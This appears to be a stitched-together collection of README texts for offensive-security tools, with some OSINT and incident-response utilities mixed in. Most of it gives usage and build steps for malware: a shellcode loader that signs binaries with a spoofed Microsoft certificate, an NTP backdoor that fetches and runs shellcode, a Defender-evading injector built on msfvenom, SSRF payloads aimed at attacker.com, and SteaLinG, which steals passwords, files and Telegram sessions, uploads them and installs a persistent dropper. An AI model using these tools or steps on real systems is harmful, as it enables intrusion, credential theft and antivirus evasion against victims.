A project created with an aim to emulate and test exfiltration of data over different network protocols. The emulation is performed w/o the usage of native API's. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.
Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the below metioned progamming/scripting languages:
Download the latest ZIP from realease.
With SSl: python3 HTTP-S-EXFIL.py ssl
Without SSL: python3 HTTP-S-EXFIL.py
CNet.exe <Server-IP-ADDRESS>
- Select any optionChashNet.exe <Server-IP-ADDRESS>
- Select any option.\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>
laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.
Nt*
) functions (not all functions but most)\x90
)Windows machine w/ Visual Studio and the following components, which can be installed from Visual Studio Installer
> Individual Components
:
C++ Clang Compiler for Windows
and C++ Clang-cl for build tools
ClickOnce Publishing
Python3 and the required modules:
python3 -m pip install -r requirements.txt
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣿⣯ ⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]
options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)
shellcode execution method:
1 Early-bird APC Queue (requires sacrificial proces)
2 Thread Hijacking (requires sacrificial proces)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard
Execute builder.py
and supply the necessary data.
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀ ⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
[+] XOR-encrypting payload with
[*] Key: d3b666606468293dfa21ce2ff25e86f6
[+] AES-encrypting payload with
[*] IV: f96312f17a1a9919c74b633c5f861fe5
[*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec
[+] Modifying template using
[*] Technique: Early-bird APC Queue
[*] Process to inject: None
[*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe
[*] Parent process to spoof: svchost.exe
[+] Spoofing metadata
[*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe
[*] CompanyName: Microsoft Corporation
[*] FileDescription: Runtime Broker
[*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800)
[*] InternalName: RuntimeBroker.exe
[*] LegalCopyright: © Microsoft Corporation. All rights reserved.
[*] OriginalFilename: RuntimeBroker.exe
[*] ProductName: Microsoft® Windows® Operating System
[*] ProductVersion: 10.0.22621.608
[+] Compiling project
[*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe
[+] Signing binary with spoofed cert
[*] Domain: www.microsoft.com
[*] Version: 2
[*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6
[*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06
[*] Not Before: October 04 2022
[*] Not After: September 29 2023
[*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx
[+] All done!
[*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe
A framework fro gathering osint on GitHub users, repositories and organizations
Refer to the Wiki for installation instructions, in addition to all other documentation.
Octosuite automatically logs network and user activity of each session, the logs are saved by date and time in the .logs folder
With this application, it is aimed to accelerate the incident response processes by collecting information in linux operating systems.
Information is collected in the following contents.
/etc/passwd
cat /etc/group
cat /etc/sudoers
lastlog
cat /var/log/auth.log
uptime/proc/meminfo
ps aux
/etc/resolv.conf
/etc/hosts
iptables -L -v -n
find / -type f -size +512k -exec ls -lh {}/;
find / -mtime -1 -ls
ip a
netstat -nap
arp -a
echo $PATH
git clone https://github.com/anil-yelken/pylirt
cd pylirt
sudo pip3 install paramiko
The following information should be specified in the cred_list.txt file:
IP|Username|Password
sudo python3 plirt.py
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA getting correctly formated.
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
git clone https://github.com/4ndr34z/shells
cd shells
./install.sh
Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.
Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:
The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.
A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:
Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.
Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.
Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.
Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.
As a final verification method, images are scanned for certain strings to verify the accuracy of the model.
The accuracy of the scan can determined via the confidence scores in output. If all the mentioned conditions are met, a score of 100.0 is returned.
To train the model, data can also be fed into the model_generator.py
script, and the newly improved h5 file can be used.
pip install -r requirements.txt
.sudo apt install tesseract-ocr -y
(for Ubuntu/Debian).python3 octopii.py <location name>
, for example python3 octopii.py pii_list/
python3 octopii.py <location to scan> <additional flags>
Octopii currently supports local scanning and scanning S3 directories and open directory listings via their URLs.
Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:
Fork the official repository at https://github.com/redhuntlabs/octopii
There are 3 files in the models/
directory. - The keras_models.h5
file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python. - The labels.txt
file contains the list of labels corresponding to the index that the model returns. - The ocr_list.json
file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions etc.
Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy to use model generator called the Teachable Machine. To use it:
Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.
Note: Only upload the same as the class name, for example, the German Passport class must have German Passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.
keras_model.h5
file and labels.txt
file into the models/
directory in Octopii.The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII. Make sure they are square-ish in image size.
Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:
ocr_list.json
file. Create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
keywords
, use as many unique terms from your asset as possible, such as "Income Tax Department". Store them in a JSONArray.ocr_list.json
file.You can replace each file you modify in the models/
directory after you create or edit them via the above methods.
Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.
Note: Please take the following steps to ensure quality
ocr_list.json
.(c) Copyright 2022 RedHunt Labs Private Limited
Author: Owais Shaikh
autoSSRF is your best ally for identifying SSRF vulnerabilities at scale. Different from other ssrf automation tools, this one comes with the two following original features :
Smart fuzzing on relevant SSRF GET parameters
When fuzzing, autoSSRF only focuses on the common parameters related to SSRF (?url=
, ?uri=
, ..) and doesn’t interfere with everything else. This ensures that the original URL is still correctly understood by the tested web-application, something that might doesn’t happen with a tool which is blindly spraying query parameters.
Context-based dynamic payloads generation
For the given URL : https://host.com/?fileURL=https://authorizedhost.com
, autoSSRF would recognize authorizedhost.com as a potentially white-listed host for the web-application, and generate payloads dynamically based on that, attempting to bypass the white-listing validation. It would result to interesting payloads such as : http://authorizedhost.attacker.com
, http://authorizedhost%252F@attacker.com
, etc.
Furthermore, this tool guarantees almost no false-positives. The detection relies on the great ProjectDiscovery’s interactsh, allowing autoSSRF to confidently identify out-of-band DNS/HTTP interactions.
python3 autossrf.py -h
This displays help for the tool.
usage: autossrf.py [-h] [--file FILE] [--url URL] [--output] [--verbose]
options:
-h, --help show this help message and exit
--file FILE, -f FILE file of all URLs to be tested against SSRF
--url URL, -u URL url to be tested against SSRF
--output, -o output file path
--verbose, -v activate verbose mode
Single URL target:
python3 autossrf.py -u https://www.host.com/?param1=X¶m2=Y¶m2=Z
Multiple URLs target with verbose:
python3 autossrf.py -f urls.txt -v
1 - Clone
git clone https://github.com/Th0h0/autossrf.git
2 - Install requirements
Python libraries :
cd autossrf
pip install -r requirements.txt
Interactsh-Client :
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
autoSSRF is distributed under MIT License.
Sandman is a backdoor that is meant to work on hardened networks during red team engagements.
Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.
Since NTP is a protocol that is overlooked by many defenders resulting in wide network accessibility.
Run on windows / *nix machine:
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).
Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.
IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).
To start, you can compile the SandmanBackdoor as mentioned below, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.
To use it, you will need to follow simple steps:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
sc stop w32time
sc start w32time
NOTE: Make sure you are compiling with the x64 option and not any CPU option!
Getting and executing an arbitrary payload from an attacker's controlled server.
Can work on hardened networks since NTP is usually allowed in FW.
Impersonating a legitimate NTP server via IP spoofing.
Python 3.9
The requirements are specified in the requirements file.
To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.
To compile the backdoor I used Visual Studio 2022, you will also need to install DllExport (via Nuget or any other way) to compile it. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.
A shellcode is injected into RuntimeBroker.
Suspicious NTP communication starts with a known magic header.
YARA rule.
Orca for the shellcode.
Special thanks to Tim McGuffin for the time provider idea.
Thanks to those who already contributed and I'll happily accept contributions, make a pull request and I will review it!
This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.
xnLinkFinder supports Python 3.
$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install
Arg | Long Arg | Description |
---|---|---|
-i | --input | Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file. |
-o | --output | The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed. |
-op | --output-params | The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed. |
-ow | --output-overwrite | If the output file already exists, it will be overwritten instead of being appended to. |
-sp | --scope-prefix | Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-spo | --scope-prefix-original | If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false) |
-sf | --scope-filter | Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-c | --cookies † | Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
|
-H | --headers † | Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
|
-ra | --regex-after | RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output. |
-d | --depth † | The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix ) argument to ensure a request to links found without a domain can be attempted. |
-p | --processes † | Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25) |
-x | --exclude | Additional Link exclusions (to the list in config.yml ) in a comma separated list, e.g. careers,forum
|
-orig | --origin | Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false) |
-t | --timeout † | How many seconds to wait for the server to send data before giving up (default: 10 seconds) |
-inc | --include | Include input (-i ) links in the output (default: false) |
-u | --user-agent † | What User Agents to get links for, e.g. -u desktop mobile
|
-insecure | † | Whether TLS certificate checks should be disabled when making requests (delfault: false) |
-s429 | † | Stop when > 95 percent of responses return 429 Too Many Requests (default: false) |
-s403 | † | Stop when > 95 percent of responses return 403 Forbidden (default: false) |
-sTO | † | Stop when > 95 percent of requests time out (default: false) |
-sCE | † | Stop when > 95 percent of requests have connection errors (default: false) |
-m | --memory-threshold | The memory threshold percentage. If the machines memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95) |
-mfs | --max-file-size † | The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size os over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size.. |
-replay-proxy | † | For active link finding with URL (or file of URLs), replay the requests through this proxy. |
-ascii-only | Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason. | |
-v | --verbose | Verbose output |
-vv | --vverbose | Increased verbose output |
-h | --help | show the help message and exit |
† NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE
The config.yml
file has the keys which can be updated to suit your needs:
linkExclude
- A comma separated list of strings (e.g. .css,.jpg,.jpeg
etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.contentExclude
- A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg
etc.) that all responses Content-Type
headers are checked against. Any responses with the these content types will be excluded and not checked for links.fileExtExclude
- A comma separated list of strings (e.g. .zip,.gz,.tar
etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.regexFiles
- A list of file types separated by a pipe character (e.g. php|php3|php5
etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
respParamLinksFound
† - Whether to get potential parameters from links found in responses: True
or False
respParamPathWords
† - Whether to add path words in retrieved links as potential parameters: True
or False
respParamJSON
† - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True
or False
respParamJSVars
† - Whether javascript variables set with var
, let
or const
are added as potential parameters: True
or False
respParamXML
† - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True
or False
respParamInputField
† - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True
or False
respParamMetaName
† - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True
or False
† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True
python3 xnLinkFinder.py -i target.com
Ideally, provide scope prefix (-sp
) with the primary domain (including schema), and a scope filter (-sf
) to filter the results only to relevant domains (this can be a file or in scope domains). Also, you can pass cookies and customer headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile
) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d
) will keep sending request to links found on the previous depth search to find more links.
python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10
If you have a file of JS file URLs for example, you can look for links in those:
python3 xnLinkFinder.py -i target_js.txt
If you have a files, e.g. JS files, HTTP responses, etc. you can look for links in those:
python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com
NOTE: Sub directories are also checked. The -mfs
option can be specified to skip files over a certain size.
In Burp, select the items you want to search by highlighting the scope for example, right clicking and selecting the Save selected items
. Ensure that the option base64-encode requests and responses
option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_burp.xml
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i
starts with <?xml
then you are trying to process a Burp file.
Ideally, provide scope prefix (-sp
) with the primary domain (including schema), and a scope filter (-sf
) to filter the results only to relevant domains.
python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv
In ZAP, select the items you want to search by highlighting the History for example, clicking menu Report
and selecting Export Messages to File...
. This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_zap.txt
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i
is in the format ==== 99 ==========
for example, then you are trying to process an OWASP ZAP ASCII text file.
You can pipe xnLinkFinder to other tools. Any errors are sent to stderr
and any links found are sent to stdout
. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:
python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u
You can also pass the input through stdin
instead of -i
.
cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf rebbull.* -d 3
NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i
.
-sp
. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http): http://www.target.com
https://target-payments.com
https://static.target-cdn.com
/path/to/example.js
then giving passing -sp http://www.target.com
will result in teh output http://www.target.com/path/to/example.js
and if Depth (-d
) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains are passed using -sp
then the output will include each domain followed by /path/to/example.js
and increase the chance of finding more links.-sp
but still want the original link of /path/to/example.js
(without a domain) additionally returned in the output, the pass the argument -spo
.-sf
. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d
) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included): target.*
target-payments.com
static.target-cdn.com
-ra
. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.-v
option to have a better idea of what the tool is doing.-vv
option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.-c
), headers (-H
) and regex (-ra
) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
-o
option to give a specific output file name for Links, rather than the default of output.txt
. If you plan on running a large depth of searches, start with 2 with option -v
to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow
.-op
option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt
. Any output will be appended to the existing file, unless you pass -ow
.-d
) be wary of some sites using dynamic links so will it will just keep finding new ones. If no new links are being found, then xnlLinkFinder will stop searching. Providing the Stop flags (s429
, s403
, sTO
, sCE
) should also be considered.-d
value is high), and have limited resources, the program will stop when it reaches the memory Threshold (-m
) value and end gracefully with data intact before getting killed.Ctrl-C
) in the middle of running, be patient and any gathered data will be saved before ending gracefully.-orig
option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but it will suffixed with the origin URL in square brackets.desktop
. If you have a target that could have different links for different user agent groups, the specify -u desktop mobile
for example (separate with a space). The mobile
user agent option is an combination of mobile-apple
, mobile-android
and mobile-windows
.-i
has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs
(default: 500 MB) will be skipped.-replay-proxy
option, sometimes requests can take longer. If you start seeing more Request Timeout
errors (you'll see errors if you use -v
or -vv
options) then consider using -t
to raise the timeout limit.-ascii-only
. This can eliminate a number of false positives that can sometimes get returned from binary data.If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv
to reproduce the problem and let me know about any error messages that are given.
Active link finding for a domain:
...Piped input and output:
Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)
Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).
Firstly, generate a payload in binary format( using either CobaltStrike
or msfvenom
) for instance, in msfvenom
, you can do it like so( the payload I'm using is for illustration purposes, you can use whatever payload you want ):
msfvenom -p windows/messagebox -f raw -o shellcode.bin
Then convert the shellcode( in binary/raw format ) into a UUID
string format using the Python3 script, bin_to_uuid.py
:
./bin_to_uuid.py -p shellcode.bin > uuid.txt
xor
encrypt the UUID
strings in the uuid.txt
using the Python3 script, xor_encryptor.py
.
./xor_encryptor.py uuid.txt > xor_crypted_out.txt
Copy the C-style
array in the file, xor_crypted_out.txt
, and paste it in the C++ file as an array of unsigned char
i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}
This shellcode injection technique comprises the following subsequent steps:
VirtualAlloc
xor
decrypts the payload using the xor
key valueUuidFromStringA
to convert UUID
strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory
or memcpy
.EnumChildWindows
to execute the payload previously loaded into memory( in step 1 )memcpy
or WriteProcessMemory
which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called UuidFromStringA
which can be used to decode data as well as write it to memory( Isn't that great folks? And please don't say "NO!" :) ).xor
key(row 86) to what you wish. This can be done in the ./xor_encryptor.py
python3 script by changing the KEY
variable.executable filename
value(row 90) to your filename.mingw
was used but you can use whichever compiler you prefer. :)make
The binary was scanned using antiscan.me on 01/08/2022.
https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it
This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes
module | Short description |
---|---|
Dump password | steal All passwords saved , upload file a passwords saved to mega |
Dump History | dump browser history |
dump files | Steal files from the hard drive with the extension you want |
module | Short description |
---|---|
1-Telegram Session Hijack | Telegram session hijacker |
C:\Users<pc name >\AppData\Roaming\Telegram Desktop
in the 'tedata' folderC:
└── Users
├── .AppData
│ └── Roaming
│ └── TelegramDesktop
│ └── tdata
Once you have moved this folder with all its contents on your device in the same path, then you do what will happen for it is that simple The tool does all this, all you have to do is give it your token on the site https://anonfiles.com/
The first step is to go to the path where the tdata file is located, and then convert it to a zip file. Of course, if the Telegram was working, this would not happen. If there was any error, it means that the Telegram is open, so I would do the kill processes. antivirus You will see that this is malicious behavior, so I avoided this part at all by the try and except in the code The name of the archive file is used in the name of the device of your victim, because if you have more than one, I mean, after that, you will post request for the zipfile on the anonfiles website using the API key or the token of your account on the site. On it, you will find your token Just that, teacher, and it is not exposed from any AV
module |
---|
2- Dropper |
URL
of the virus or whatever you want to download to the victim's device, but keep in mind that the URL must be direct
, meaning that it must be the end Its Yama .exe or .png,
whatever is important is that it be a link that ends with a backstamp The second thing is to take the API Kay from you, and you will answer it as well. Either you register, click on the word API, you will find it, and you will take the username and password So how does it work?
The first thing is to create a paste on the site and make it private Then it adds the url you gave it and then it gives you the exe file, its function is that when it works on any device it starts adding itself to Registry device in two different ways It starts to open pastebin and inserts the special paste you created, takes the paste url, downloads its content and runs And you can enter the url at any time and put another url. It is very normal because the dropper goes every 10 minutes. Checks the URL. If it finds it, it changes it, downloads its content, downloads it, and connects to find it. You don't do anything, and so, every 10 minutes, you can literally do it, you can access your device from anywhere
3- Linux support
4-You can now choose between Mega or Pastebin
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
